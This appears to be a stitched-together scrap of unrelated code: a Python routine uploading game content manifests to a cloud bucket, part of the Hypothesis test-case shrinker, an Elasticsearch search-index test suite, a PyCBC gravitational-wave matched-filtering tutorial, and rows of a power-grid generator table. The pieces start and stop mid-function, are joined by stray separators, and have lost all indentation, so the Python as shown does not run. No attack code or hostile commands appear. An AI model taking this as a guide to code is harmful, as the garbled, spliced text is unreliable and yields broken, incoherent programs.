# Need to preserve sub-folder data
manifest_path = ensure_posix_path(manifest_path)
manifest_folder = dynamic_content_settings.get_manifest_folder()
# Strip out any path information before the default manifest folder
# to get relative sub-path under folder
manifest_sub_path = manifest_path.partition(manifest_folder)[2]
manifest_local_folder = dynamic_content_settings.get_manifest_folder()
if len(manifest_sub_path):
manifest_local_folder = manifest_local_folder + os.path.dirname(manifest_sub_path)
manifest_object = {
'keyName': os.path.split(manifest_path)[1],
'localFolder': manifest_local_folder,
'hash': hashlib.md5(open(manifest_path, 'rb').read()).hexdigest()
}
file_stat = os.stat(manifest_path)
manifest_object['size'] = file_stat.st_size
files_list.append(manifest_object)
# 1 - Build new paks to ensure our paks are up to date and our manifest reflects the latest changes
# 2 - Update our manifest hashes to match our current content
# 3 - Check each item in our manifest against a HEAD call to get the metadata with our saved local hash values
# 4 - Upload each unmatched pak file
# 5 - Upload the manifest (In pak and loose)
def upload_manifest_content(context, manifest_path, deployment_name, staging_args, upload_all=False, do_signing=False, invalidate_existing_files=False):
build_new_paks(context, manifest_path, upload_all)
manifest_path, manifest = _get_path_and_manifest(context, manifest_path)
_update_file_hashes(context, manifest_path, manifest)
remaining_content = _get_unmatched_content(context, manifest, manifest_path, deployment_name, do_signing)
bucket_name = _get_content_bucket_by_name(context, deployment_name)
files_list = _get_files_list(context, manifest, 'Paks')
_append_loose_manifest(context, files_list, manifest_path)
uploaded_files = {}
for thisFile in files_list:
this_key = _create_bucket_key(thisFile)
if this_key in remaining_content or upload_all:
this_file_path = _get_path_for_file_entry(context, thisFile, context.config.game_directory_name)
if thisFile['hash'] == '':
show_manifest.skipping_invalid_file(this_file_path)
continue
show_manifest.found_updated_item(this_key)
context.view.found_updated_item(this_key)
_do_file_upload(context, this_file_path, bucket_name, this_key, thisFile['hash'], invalidate_existing_files)
upload_info = {}
if do_signing:
this_signature = signing.get_file_signature(context, _get_path_for_file_entry(context, thisFile, context.config.game_directory_name))
upload_info['Signature'] = this_signature
upload_info['Size'] = thisFile.get('size')
upload_info['Hash'] = thisFile.get('hash')
uploaded_files[this_key] = upload_info
parent_pak_key = get_standalone_manifest_pak_key(context, manifest_path)
parent_loose_key = get_standalone_manifest_key(context, manifest_path)
if staging_args is not None:
for thisFile, fileInfo in iteritems(uploaded_files):
staging_args['Signature'] = fileInfo.get('Signature')
staging_args['Size'] = fileInfo.get('Size')
staging_args['Hash'] = fileInfo.get('Hash')
if thisFile in [parent_pak_key, parent_loose_key]:
staging_args['Parent'] = ''
else:
staging_args['Parent'] = parent_pak_key
staging.set_staging_status(thisFile, context, staging_args, deployment_name)
def _get_meta_hash_name():
return 'hash'
def _do_file_upload(context, | |
'command'):
self.known_programs.add(run.command)
self.passes.append(p)
self.passes_awaiting_requeue.append(p)
self.passes_by_name[p.name] = p
return p
def shrink_pass(self, name):
if hasattr(Shrinker, name) and name not in self.passes_by_name:
self.add_new_pass(name, classification=PassClassification.SPECIAL)
return self.passes_by_name[name]
def requeue_passes(self):
"""Move all passes from passes_awaiting_requeue to their relevant
queues."""
while self.passes_awaiting_requeue:
p = self.passes_awaiting_requeue.pop()
heapq.heappush(self.pass_queues[p.classification], p)
def has_queued_passes(self, classification):
"""Checks if any shrink passes are currently enqued under this
classification (note that there may be passes with this classification
currently awaiting requeue)."""
return len(self.pass_queues[classification]) > 0
def pop_queued_pass(self, classification):
"""Pop and run a single queued pass with this classification."""
sp = heapq.heappop(self.pass_queues[classification])
self.passes_awaiting_requeue.append(sp)
self.run_shrink_pass(sp)
def run_queued_until_change(self, classification):
"""Run passes with this classification until there are no more or one
of them succeeds in shrinking the target."""
initial = self.shrink_target
while (
self.has_queued_passes(classification) and
self.shrink_target is initial
):
self.pop_queued_pass(classification)
return self.shrink_target is not initial
def run_one_queued_pass(self, classification):
"""Run a single queud pass with this classification (if there are
any)."""
if self.has_queued_passes(classification):
self.pop_queued_pass(classification)
def run_queued_passes(self, classification):
"""Run all queued passes with this classification."""
while self.has_queued_passes(classification):
self.pop_queued_pass(classification)
@property
def calls(self):
return self.__engine.call_count
def consider_new_buffer(self, buffer):
buffer = hbytes(buffer)
return buffer.startswith(self.buffer) or \
self.incorporate_new_buffer(buffer)
def incorporate_new_buffer(self, buffer):
buffer = hbytes(buffer[:self.shrink_target.index])
try:
existing = self.__test_function_cache[buffer]
except KeyError:
pass
else:
return self.incorporate_test_data(existing)
# Sometimes an attempt at lexicographic minimization will do the wrong
# thing because the buffer has changed under it (e.g. something has
# turned into a write, the bit size has changed). The result would be
# an invalid string, but it's better for us to just ignore it here as
# it turns out to involve quite a lot of tricky book-keeping to get
# this right and it's better to just handle it in one place.
if sort_key(buffer) >= sort_key(self.shrink_target.buffer):
return False
if self.shrink_target.buffer.startswith(buffer):
return False
if not self.__engine.prescreen_buffer(buffer):
return False
assert sort_key(buffer) <= sort_key(self.shrink_target.buffer)
data = ConjectureData.for_buffer(buffer)
self.__engine.test_function(data)
self.__test_function_cache[buffer] = data
return self.incorporate_test_data(data)
def incorporate_test_data(self, data):
self.__test_function_cache[data.buffer] = data
if (
self.__predicate(data) and
sort_key(data.buffer) < sort_key(self.shrink_target.buffer)
):
self.update_shrink_target(data)
self.__shrinking_block_cache = {}
return True
return False
def cached_test_function(self, buffer):
buffer = hbytes(buffer)
try:
return self.__test_function_cache[buffer]
except KeyError:
pass
result = self.__engine.cached_test_function(buffer)
self.incorporate_test_data(result)
self.__test_function_cache[buffer] = result
return result
def debug(self, msg):
self.__engine.debug(msg)
@property
def random(self):
return self.__engine.random
def run_shrink_pass(self, sp):
"""Runs the function associated with ShrinkPass sp and updates the
relevant metadata.
Note that sp may or may not be a pass currently associated with
this shrinker. This does not handle any requeing that is
required.
"""
if isinstance(sp, str):
sp = self.shrink_pass(sp)
self.debug('Shrink Pass %s' % (sp.name,))
initial_shrinks = self.shrinks
initial_calls = self.calls
size = len(self.shrink_target.buffer)
try:
sp.pass_function(self)
finally:
calls = self.calls - initial_calls
shrinks = self.shrinks - initial_shrinks
deletions = size - len(self.shrink_target.buffer)
sp.calls += calls
sp.shrinks += shrinks
sp.deletions += deletions
sp.runs += 1
self.debug('Shrink Pass %s completed.' % (sp.name,))
# Complex state machine alert! A pass run can either succeed (we made
# at least one shrink) or fail (we didn't). This changes the pass's
# current classification according to the following possible
# transitions:
#
# CANDIDATE -------> HOPEFUL
# | ^
# | |
# v v
# AVOID ---------> DUBIOUS
#
# From best to worst we want to run HOPEFUL, CANDIDATE, DUBIOUS, AVOID.
# We will try any one of them if we have to but we want to prioritise.
#
# When a run succeeds, a pass will follow an arrow to a better class.
# When it fails, it will follow an arrow to a worse one.
# If no such arrow is available, it stays where it is.
#
# We also have the classification SPECIAL for passes that do not get
# run as part of the normal process.
previous = sp.classification
# If the pass didn't actually do anything we don't reclassify it. This
# is for things like remove_discarded which often are inapplicable.
if calls > 0 and sp.classification != PassClassification.SPECIAL:
if shrinks == 0:
if sp.successes > 0:
sp.classification = PassClassification.DUBIOUS
else:
sp.classification = PassClassification.AVOID
else:
sp.successes += 1
if sp.classification == PassClassification.AVOID:
sp.classification = PassClassification.DUBIOUS
else:
sp.classification = PassClassification.HOPEFUL
if previous != sp.classification:
self.debug('Reclassified %s from %s to %s' % (
sp.name, previous.name, sp.classification.name
))
def shrink(self):
"""Run the full set of shrinks and update shrink_target.
This method is "mostly idempotent" - calling it twice is unlikely to
have any effect, though it has a non-zero probability of doing so.
"""
# We assume that if an all-zero block of bytes is an interesting
# example then we're not going to do better than that.
# This might not technically be true: e.g. for integers() | booleans()
# the simplest example is actually [1, 0]. Missing this case is fairly
# harmless and this allows us to make various simplifying assumptions
# about the structure of the data (principally that we're never
# operating on a block of all zero bytes so can use non-zeroness as a
# signpost of complexity).
if (
not any(self.shrink_target.buffer) or
self.incorporate_new_buffer(hbytes(len(self.shrink_target.buffer)))
):
return
try:
self.greedy_shrink()
finally:
if self.__engine.report_debug_info:
def s(n):
return 's' if n != 1 else ''
total_deleted = self.initial_size - len(
self.shrink_target.buffer)
self.debug('---------------------')
self.debug('Shrink pass profiling')
self.debug('---------------------')
self.debug('')
calls = self.__engine.call_count - self.initial_calls
self.debug((
'Shrinking made a total of %d call%s '
'of which %d shrank. This deleted %d byte%s out of %d.'
) % (
calls, s(calls),
self.shrinks,
total_deleted, s(total_deleted),
self.initial_size,
))
for useful in [True, False]:
self.debug('')
if useful:
self.debug('Useful passes:')
else:
self.debug('Useless passes:')
self.debug('')
for p in sorted(
self.passes,
key=lambda t: (
-t.calls, -t.runs,
t.deletions, t.shrinks,
),
):
if p.calls == 0:
continue
if (p.shrinks != 0) != useful:
continue
self.debug((
' * %s ran %d time%s, making %d call%s of which '
'%d shrank, deleting %d byte%s.'
) % (
p.name,
p.runs, s(p.runs),
p.calls, s(p.calls),
p.shrinks,
p.deletions, s(p.deletions),
))
self.debug('')
def greedy_shrink(self):
"""Run a full set of greedy shrinks (that is, ones that will only ever
move to a better target) and update shrink_target appropriately.
This method iterates to a fixed point and so is idempontent - calling
it twice will have exactly the same effect as calling it once.
"""
self.run_shrink_pass('alphabet_minimize')
while self.single_greedy_shrink_iteration():
self.run_shrink_pass('lower_common_block_offset')
def single_greedy_shrink_iteration(self):
"""Performs a single run through each greedy shrink pass, but does not
loop to achieve a fixed point."""
initial = self.shrink_target
# What follows is a slightly delicate dance. What we want to do is try
# to ensure that:
#
# 1. If it is possible for us to be deleting data, we should be.
# 2. We do not end up repeating a lot of passes uselessly.
# 3. We do not want to run expensive or useless passes if we can
# possibly avoid doing so.
self.requeue_passes()
self.run_shrink_pass('remove_discarded')
# First run the entire set of solid passes (ones that have previously
# made changes). It's important that we run all of them, not just one,
# as typically each pass may unlock others.
self.run_queued_passes(PassClassification.HOPEFUL)
# While our solid passes are successfully shrinking the buffer, we can
# just keep doing that (note that this is a stronger condition than
# just making shrinks - it's a much better sense of progress. We can
# make only O(n) length reductions but we can make exponentially many
# shrinks).
if len(self.buffer) < len(initial.buffer):
return True
# If we're stuck on length reductions then we pull in one candiate pass
# (if there are any).
# This should hopefully help us unlock any local minima that were
# starting to reduce the utility of the previous solid passes.
self.run_one_queued_pass(PassClassification.CANDIDATE)
# We've pulled in a new candidate pass (or have no candidate passes
# left) and are making shrinks with the solid passes, so lets just
# keep on doing that.
if self.shrink_target is not initial:
return True
# We're a bit stuck, so it's time to try some new passes.
for | |
# encoding: utf-8
import pytest
from collections import defaultdict
import datetime
import json
import logging
import re
import time
from psycopg2.extras import NumericRange
from ..testing import (
DatabaseTest,
)
from elasticsearch_dsl import Q
from elasticsearch_dsl.function import (
ScriptScore,
RandomScore,
)
from elasticsearch_dsl.query import (
Bool,
DisMax,
Query as elasticsearch_dsl_query,
MatchAll,
Match,
MatchNone,
MatchPhrase,
MultiMatch,
Nested,
Range,
Term,
Terms,
)
from elasticsearch.exceptions import ElasticsearchException
from ..config import (
Configuration,
CannotLoadConfiguration,
)
from ..lane import (
Facets,
FeaturedFacets,
Lane,
Pagination,
SearchFacets,
WorkList,
)
from ..metadata_layer import (
ContributorData,
IdentifierData,
)
from ..model import (
ConfigurationSetting,
Contribution,
Contributor,
DataSource,
Edition,
ExternalIntegration,
Genre,
Work,
WorkCoverageRecord,
get_one_or_create,
)
from ..external_search import (
CurrentMapping,
ExternalSearchIndex,
Filter,
Mapping,
MockExternalSearchIndex,
MockSearchResult,
Query,
QueryParser,
SearchBase,
SearchIndexCoverageProvider,
SortKeyPagination,
WorkSearchResult,
mock_search_index,
)
from ..classifier import Classifier
from ..problem_details import INVALID_INPUT
from ..testing import (
ExternalSearchTest,
EndToEndSearchTest,
)
RESEARCH = Term(audience=Classifier.AUDIENCE_RESEARCH.lower())
class TestExternalSearch(ExternalSearchTest):
def test_load(self):
# Normally, load() returns a brand new ExternalSearchIndex
# object.
loaded = ExternalSearchIndex.load(self._db, in_testing=True)
assert isinstance(loaded, ExternalSearchIndex)
# However, inside the mock_search_index context manager,
# load() returns whatever object was mocked.
mock = object()
with mock_search_index(mock):
assert mock == ExternalSearchIndex.load(self._db, in_testing=True)
def test_constructor(self):
# The configuration of the search ExternalIntegration becomes the
# configuration of the ExternalSearchIndex.
#
# This basically just verifies that the test search term is taken
# from the ExternalIntegration.
class MockIndex(ExternalSearchIndex):
def set_works_index_and_alias(self, _db):
self.set_works_index_and_alias_called_with = _db
index = MockIndex(self._db)
assert self._db == index.set_works_index_and_alias_called_with
assert "test_search_term" == index.test_search_term
# TODO: would be good to check the put_script calls, but the
# current constructor makes put_script difficult to mock.
def test_elasticsearch_error_in_constructor_becomes_cannotloadconfiguration(self):
"""If we're unable to establish a connection to the Elasticsearch
server, CannotLoadConfiguration (which the circulation manager can
understand) is raised instead of an Elasticsearch-specific exception.
"""
# Unlike other tests in this module, this one runs even if no
# ElasticSearch server is running, since it's testing what
# happens if there's a problem communicating with that server.
class Mock(ExternalSearchIndex):
def set_works_index_and_alias(self, _db):
raise ElasticsearchException("very bad")
with pytest.raises(CannotLoadConfiguration) as excinfo:
Mock(self._db)
assert "Exception communicating with Elasticsearch server: " in str(excinfo.value)
assert "very bad" in str(excinfo.value)
def test_works_index_name(self):
"""The name of the search index is the prefix (defined in
ExternalSearchTest.setup) plus a version number associated
with this version of the core code.
"""
assert "test_index-v4" == self.search.works_index_name(self._db)
def test_setup_index_creates_new_index(self):
current_index = self.search.works_index
# This calls self.search.setup_index (which is what we're testing)
# and also registers the index to be torn down at the end of the test.
self.setup_index('the_other_index')
# Both indices exist.
assert True == self.search.indices.exists(current_index)
assert True == self.search.indices.exists('the_other_index')
# The index for the app's search is still the original index.
assert current_index == self.search.works_index
# The alias hasn't been passed over to the new index.
alias = 'test_index-' + self.search.CURRENT_ALIAS_SUFFIX
assert alias == self.search.works_alias
assert True == self.search.indices.exists_alias(current_index, alias)
assert False == self.search.indices.exists_alias('the_other_index', alias)
def test_set_works_index_and_alias(self):
# If the index or alias don't exist, set_works_index_and_alias
# will create them.
self.integration.set_setting(ExternalSearchIndex.WORKS_INDEX_PREFIX_KEY, u'banana')
self.search.set_works_index_and_alias(self._db)
expected_index = 'banana-' + CurrentMapping.version_name()
expected_alias = 'banana-' + self.search.CURRENT_ALIAS_SUFFIX
assert expected_index == self.search.works_index
assert expected_alias == self.search.works_alias
# If the index and alias already exist, set_works_index_and_alias
# does nothing.
self.search.set_works_index_and_alias(self._db)
assert expected_index == self.search.works_index
assert expected_alias == self.search.works_alias
def test_setup_current_alias(self):
# The index was generated from the string in configuration.
version = CurrentMapping.version_name()
index_name = 'test_index-' + version
assert index_name == self.search.works_index
assert True == self.search.indices.exists(index_name)
# The alias is also created from the configuration.
alias = 'test_index-' + self.search.CURRENT_ALIAS_SUFFIX
assert alias == self.search.works_alias
assert True == self.search.indices.exists_alias(index_name, alias)
# If the -current alias is already set on a different index, it
# won't be reassigned. Instead, search will occur against the
# index itself.
ExternalSearchIndex.reset()
self.integration.set_setting(ExternalSearchIndex.WORKS_INDEX_PREFIX_KEY, u'my-app')
self.search = ExternalSearchIndex(self._db)
assert 'my-app-%s' % version == self.search.works_index
assert 'my-app-' + self.search.CURRENT_ALIAS_SUFFIX == self.search.works_alias
def test_transfer_current_alias(self):
# An error is raised if you try to set the alias to point to
# an index that doesn't already exist.
pytest.raises(
ValueError, self.search.transfer_current_alias, self._db,
'no-such-index'
)
original_index = self.search.works_index
# If the -current alias doesn't exist, it's created
# and everything is updated accordingly.
self.search.indices.delete_alias(
index=original_index, name='test_index-current', ignore=[404]
)
self.setup_index(new_index='test_index-v9999')
self.search.transfer_current_alias(self._db, 'test_index-v9999')
assert 'test_index-v9999' == self.search.works_index
assert 'test_index-current' == self.search.works_alias
# If the -current alias already exists on the index,
# it's used without a problem.
self.search.transfer_current_alias(self._db, 'test_index-v9999')
assert 'test_index-v9999' == self.search.works_index
assert 'test_index-current' == self.search.works_alias
# If the -current alias is being used on a different version of the
# index, it's deleted from that index and placed on the new one.
self.setup_index(original_index)
self.search.transfer_current_alias(self._db, original_index)
assert original_index == self.search.works_index
assert 'test_index-current' == self.search.works_alias
# It has been removed from other index.
assert False == self.search.indices.exists_alias(
index='test_index-v9999', name='test_index-current')
# And only exists on the new index.
alias_indices = self.search.indices.get_alias(name='test_index-current').keys()
assert [original_index] == alias_indices
# If the index doesn't have the same base name, an error is raised.
pytest.raises(
ValueError, self.search.transfer_current_alias, self._db,
'banana-v10'
)
def test_query_works(self):
# Verify that query_works operates by calling query_works_multi.
# The actual functionality of query_works and query_works_multi
# have many end-to-end tests in TestExternalSearchWithWorks.
class Mock(ExternalSearchIndex):
def __init__(self):
self.query_works_multi_calls = []
self.queued_results = []
def query_works_multi(self, queries, debug=False):
self.query_works_multi_calls.append((queries, debug))
return self.queued_results.pop()
search = Mock()
# If the filter is designed to match nothing,
# query_works_multi isn't even called -- we just return an
# empty list.
query = object()
pagination = object()
filter = Filter(match_nothing=True)
assert [] == search.query_works(query, filter, pagination)
assert [] == search.query_works_multi_calls
# Otherwise, query_works_multi is called with a list
# containing a single query, and the list of resultsets is
# turned into a single list of results.
search.queued_results.append([["r1", "r2"]])
filter = object()
results = search.query_works(query, filter, pagination)
assert ["r1", "r2"] == results
call = search.query_works_multi_calls.pop()
assert ([(query, filter, pagination)], False) == call
assert [] == search.query_works_multi_calls
# If no Pagination object is provided, a default is used.
search.queued_results.append([["r3", "r4"]])
results = search.query_works(query, filter, None, True)
assert ["r3", "r4"] == results
([query_tuple], debug) = search.query_works_multi_calls.pop()
assert True == debug
assert query == query_tuple[0]
assert filter == query_tuple[1]
pagination = query_tuple[2]
default = Pagination.default()
assert isinstance(pagination, Pagination)
assert pagination.offset == default.offset
assert pagination.size == default.size
def test__run_self_tests(self):
index = MockExternalSearchIndex()
# First, see what happens when the search returns no results.
test_results = [x for x in index._run_self_tests(self._db, in_testing=True)]
assert "Search results for 'a search term':" == test_results[0].name
assert True == test_results[0].success
assert [] == test_results[0].result
assert "Search document for 'a search term':" == test_results[1].name
assert True == test_results[1].success
assert "[]" == test_results[1].result
assert "Raw search results for 'a search term':" == test_results[2].name
assert True == test_results[2].success
assert [] == test_results[2].result
assert "Total number of search results for 'a search term':" == test_results[3].name
assert True == test_results[3].success
assert "0" == test_results[3].result
assert "Total number of documents in this search index:" == test_results[4].name
assert True == test_results[4].success
assert "0" == test_results[4].result
assert "Total number of documents per collection:" == test_results[5].name
assert True == test_results[5].success
assert "{}" == test_results[5].result
# Set up the search index so it will return a result.
collection = self._collection()
search_result = MockSearchResult(
"Sample Book Title", "author", {}, "id"
)
index.index("index", "doc type", "id", search_result)
test_results = [x for x in index._run_self_tests(self._db, in_testing=True)]
assert "Search results for 'a search term':" == test_results[0].name
assert True == test_results[0].success
assert ["Sample Book Title (author)"] == test_results[0].result
assert "Search document for 'a search term':" == test_results[1].name
assert True == test_results[1].success
result = json.loads(test_results[1].result)
sample_book = {"author": "author", "meta": {"id": "id", "_sort": [u'Sample Book Title', u'author', u'id']}, "id": "id", "title": "Sample Book Title"}
assert sample_book == result
assert "Raw search results for 'a search term':" == test_results[2].name
assert True == test_results[2].success
result = json.loads(test_results[2].result[0])
assert sample_book == result
assert "Total number of search results for 'a search term':" == test_results[3].name
assert True == test_results[3].success
assert "1" == test_results[3].result
assert "Total number of documents in this search index:" == test_results[4].name
assert True == test_results[4].success
assert "1" == test_results[4].result
assert "Total number of documents per collection:" == test_results[5].name
assert True == test_results[5].success
result = json.loads(test_results[5].result)
assert {collection.name: 1} == result
class TestCurrentMapping(object):
def test_character_filters(self):
# Verify the functionality of the regular | |
#!/usr/bin/env python
# coding: utf-8
# <img style="float: left;padding: 1.3em" src="https://indico.in2p3.fr/event/18313/logo-786578160.png">
#
# # Gravitational Wave Open Data Workshop #3
#
#
# ## Tutorial 2.1 PyCBC Tutorial, An introduction to matched-filtering
#
# We will be using the [PyCBC](http://github.com/ligo-cbc/pycbc) library, which is used to study gravitational-wave data, find astrophysical sources due to compact binary mergers, and study their parameters. These are some of the same tools that the LIGO and Virgo collaborations use to find gravitational waves in LIGO/Virgo data
#
# In this tutorial we will walk through how find a specific signal in LIGO data. We present matched filtering as a cross-correlation, in both the time domain and the frequency domain. In the next tutorial (2.2), we use the method as encoded in PyCBC, which is optimal in the case of Gaussian noise and a known signal model. In reality our noise is not entirely Gaussian, and in practice we use a variety of techniques to separate signals from noise in addition to the use of the matched filter.
#
# [Click this link to view this tutorial in Google Colaboratory](https://colab.research.google.com/github/gw-odw/odw-2020/blob/master/Day_2/Tuto_2.1_Matched_filtering_introduction.ipynb)
#
# Additional [examples](http://pycbc.org/pycbc/latest/html/#library-examples-and-interactive-tutorials) and module level documentation are [here](http://pycbc.org/pycbc/latest/html/py-modindex.html)
# ## Installation (un-comment and execute only if running on a cloud platform!)
# In[1]:
# -- Use the following for Google Colab
#! pip install -q 'lalsuite==6.66' 'PyCBC==1.15.3'
# **Important:** With Google Colab, you may need to restart the runtime after running the cell above.
# ### Matched-filtering: Finding well modelled signals in Gaussian noise
#
# Matched filtering can be shown to be the optimal method for "detecting" signals---when the signal waveform is known---in Gaussian noise. We'll explore those assumptions a little later, but for now let's demonstrate how this works.
#
# Let's assume you have a stretch of noise, white noise to start:
# In[162]:
get_ipython().run_line_magic('matplotlib', 'inline')
import numpy
import pylab
# specify the sample rate.
# LIGO raw data is sampled at 16384 Hz (=2^14 samples/second).
# It captures signal frequency content up to f_Nyquist = 8192 Hz.
# Here, we will make the computation faster by sampling at a lower rate.
sample_rate = 1024 # samples per second
data_length = 1024 # seconds
# Generate a long stretch of white noise: the data series and the time series.
data = numpy.random.normal(size=[sample_rate * data_length])
times = numpy.arange(len(data)) / float(sample_rate)
# And then let's add a gravitational wave signal to some random part of this data.
# In[163]:
from pycbc.waveform import get_td_waveform
# the "approximant" (jargon for parameterized waveform family).
# IMRPhenomD is defined in the frequency domain, but we'll get it in the time domain (td).
# It runs fast, but it doesn't include effects such as non-aligned component spin, or higher order modes.
apx = 'IMRPhenomD'
# You can specify many parameters,
# https://pycbc.org/pycbc/latest/html/pycbc.waveform.html?highlight=get_td_waveform#pycbc.waveform.waveform.get_td_waveform
# but here, we'll use defaults for everything except the masses.
# It returns both hplus and hcross, but we'll only use hplus for now.
hp1, _ = get_td_waveform(approximant=apx,
mass1=10,
mass2=10,
delta_t=1.0/sample_rate,
f_lower=25)
# The amplitude of gravitational-wave signals is normally of order 1E-20. To demonstrate our method
# on white noise with amplitude O(1) we normalize our signal so the cross-correlation of the signal with
# itself will give a value of 1. In this case we can interpret the cross-correlation of the signal with white
# noise as a signal-to-noise ratio.
hp1 = hp1 / max(numpy.correlate(hp1,hp1, mode='full'))**0.5
# note that in this figure, the waveform amplitude is of order 1.
# The duration (for frequency above f_lower=25 Hz) is only 3 or 4 seconds long.
# The waveform is "tapered": slowly ramped up from zero to full strength, over the first second or so.
# It is zero-padded at earlier times.
pylab.figure()
pylab.title("The waveform hp1")
pylab.plot(hp1.sample_times, hp1)
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
# Shift the waveform to start at a random time in the Gaussian noise data.
waveform_start = numpy.random.randint(0, len(data) - len(hp1))
data[waveform_start:waveform_start+len(hp1)] += 10 * hp1.numpy()
pylab.figure()
pylab.title("Looks like random noise, right?")
pylab.plot(hp1.sample_times, data[waveform_start:waveform_start+len(hp1)])
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
pylab.figure()
pylab.title("Signal in the data")
pylab.plot(hp1.sample_times, data[waveform_start:waveform_start+len(hp1)])
pylab.plot(hp1.sample_times, 10 * hp1)
pylab.xlabel('Time (s)')
pylab.ylabel('Normalized amplitude')
# To search for this signal we can cross-correlate the signal with the entire dataset -> Not in any way optimized at this point, just showing the method.
#
# We will do the cross-correlation in the time domain, once for each time step. It runs slowly...
# In[164]:
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1_numpy = hp1.numpy()
for i in range(len(data) - len(hp1_numpy)):
cross_correlation[i] = (hp1_numpy * data[i:i+len(hp1_numpy)]).sum()
# plot the cross-correlated data vs time. Superimpose the location of the end of the signal;
# this is where we should find a peak in the cross-correlation.
pylab.figure()
times = numpy.arange(len(data) - len(hp1_numpy)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)], [-10,10],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# Here you can see that the largest spike from the cross-correlation comes at the time of the signal. We only really need one more ingredient to describe matched-filtering: "Colored" noise (Gaussian noise but with a frequency-dependent variance; white noise has frequency-independent variance).
#
# Let's repeat the process, but generate a stretch of data colored with LIGO's zero-detuned--high-power noise curve. We'll use a PyCBC library to do this.
# In[165]:
# http://pycbc.org/pycbc/latest/html/noise.html
import pycbc.noise
import pycbc.psd
# The color of the noise matches a PSD which you provide:
# Generate a PSD matching Advanced LIGO's zero-detuned--high-power noise curve
flow = 10.0
delta_f = 1.0 / 128
flen = int(sample_rate / (2 * delta_f)) + 1
psd = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, flow)
# Generate colored noise
delta_t = 1.0 / sample_rate
ts = pycbc.noise.noise_from_psd(data_length*sample_rate, delta_t, psd, seed=127)
# Estimate the amplitude spectral density (ASD = sqrt(PSD)) for the noisy data
# using the "welch" method. We'll choose 4 seconds PSD samples that are overlapped 50%
seg_len = int(4 / delta_t)
seg_stride = int(seg_len / 2)
estimated_psd = pycbc.psd.welch(ts,seg_len=seg_len,seg_stride=seg_stride)
# plot it:
pylab.loglog(estimated_psd.sample_frequencies, estimated_psd, label='estimate')
pylab.loglog(psd.sample_frequencies, psd, linewidth=3, label='known psd')
pylab.xlim(xmin=flow, xmax=512)
pylab.ylim(1e-47, 1e-45)
pylab.legend()
pylab.grid()
pylab.show()
# add the signal, this time, with a "typical" amplitude.
ts[waveform_start:waveform_start+len(hp1)] += hp1.numpy() * 1E-20
# Then all we need to do is to "whiten" both the data, and the template waveform. This can be done, in the frequency domain, by dividing by the PSD. This *can* be done in the time domain as well, but it's more intuitive in the frequency domain
# In[166]:
# Generate a PSD for whitening the data
from pycbc.types import TimeSeries
# The PSD, sampled properly for the noisy data
flow = 10.0
delta_f = 1.0 / data_length
flen = int(sample_rate / (2 * delta_f)) + 1
psd_td = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The PSD, sampled properly for the signal
delta_f = sample_rate / float(len(hp1))
flen = int(sample_rate / (2 * delta_f)) + 1
psd_hp1 = pycbc.psd.aLIGOZeroDetHighPower(flen, delta_f, 0)
# The 0th and Nth values are zero. Set them to a nearby value to avoid dividing by zero.
psd_td[0] = psd_td[1]
psd_td[len(psd_td) - 1] = psd_td[len(psd_td) - 2]
# Same, for the PSD sampled for the signal
psd_hp1[0] = psd_hp1[1]
psd_hp1[len(psd_hp1) - 1] = psd_hp1[len(psd_hp1) - 2]
# convert both noisy data and the signal to frequency domain,
# and divide each by ASD=PSD**0.5, then convert back to time domain.
# This "whitens" the data and the signal template.
# Multiplying the signal template by 1E-21 puts it into realistic units of strain.
data_whitened = (ts.to_frequencyseries() / psd_td**0.5).to_timeseries()
hp1_whitened = (hp1.to_frequencyseries() / psd_hp1**0.5).to_timeseries() * 1E-21
# In[167]:
# Now let's re-do the correlation, in the time domain, but with whitened data and template.
cross_correlation = numpy.zeros([len(data)-len(hp1)])
hp1n = hp1_whitened.numpy()
datan = data_whitened.numpy()
for i in range(len(datan) - len(hp1n)):
cross_correlation[i] = (hp1n * datan[i:i+len(hp1n)]).sum()
# plot the cross-correlation in the time domain. Superimpose the location of the end of the signal.
# Note how much bigger the cross-correlation peak is, relative to the noise level,
# compared with the unwhitened version of the same quantity. SNR is much higher!
pylab.figure()
times = numpy.arange(len(datan) - len(hp1n)) / float(sample_rate)
pylab.plot(times, cross_correlation)
pylab.plot([waveform_start/float(sample_rate), waveform_start/float(sample_rate)],
[(min(cross_correlation))*1.1,(max(cross_correlation))*1.1],'r:')
pylab.xlabel('Time (s)')
pylab.ylabel('Cross-correlation')
# # Challenge!
#
# * Histogram the whitened time series. Ignoring the outliers associated with the signal, is it a Gaussian? What is the mean and standard deviation? (We have not been careful in normalizing the whitened data properly).
# * Histogram the above cross-correlation time series. Ignoring the outliers associated with the signal, is it a Gaussian? What is the mean and standard deviation?
# * Find the location of the peak. (Note that here, it can be positive or negative), and the value of the SNR of the signal (which is the absolute value of the peak value, divided by | |
0, 0, 0, 0],
[1109, 0.617493, 0, 9999, -9999, 1.0, 100, 1, 0.77821, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1110, 1.394187, 0, 9999, -9999, 1.0, 100, 1, 1.654557, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1111, 40.889352, 0, 9999, -9999, 1.0, 100, 1, 89.637993, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1112, 35.407461, 0, 9999, -9999, 1.0, 100, 1, 69.53429, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1113, 1.90406, 0, 9999, -9999, 1.0, 100, 1, 3.536361, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1114, 4.502525, 0, 9999, -9999, 1.0, 100, 1, 13.446889, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1115, 26.798092, 0, 9999, -9999, 1.0, 100, 1, 50.575278, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1116, 14.610523, 0, 9999, -9999, 1.0, 100, 1, 32.601142, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
